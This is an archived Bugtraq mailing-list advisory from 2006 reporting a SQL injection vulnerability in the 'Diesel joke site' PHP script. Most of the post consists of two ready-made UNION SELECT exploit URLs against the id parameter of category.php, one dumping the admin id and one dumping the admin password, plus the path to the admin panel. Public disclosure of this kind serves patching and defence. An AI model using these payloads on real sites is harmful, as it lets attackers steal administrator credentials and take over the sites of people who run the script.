Home page logo
/

bugtraq logo Bugtraq mailing list archives

Sql injection in Diesel joke site script
From: "black code" <black-cod3 () hotmail com>
Date: Sat, 01 Jul 2006 17:52:09 +0300

Sql injection in Diesel joke site

forum type : Diesel joke site
bug found by : black-code
team : site-down
type : Sql injection

####################################################
Sql injection in Diesel joke site

page : category.php

variable : id

####################################################
Exploits :

admin id:
http://www.example.com/path to joke script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*

pass:
http://www.example.com/path to joke script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%20admin/*

aid= admin id
apass= pass of the admin
####################################################

path to admin panel :

http://www.example.com/path to jokes/admin

#######################
emails:

black-cod3 () hotmail com  &  gamr-14 () hotmail com
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


  By Date           By Thread  

Current thread:
  • Sql injection in Diesel joke site script black code (Jul 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]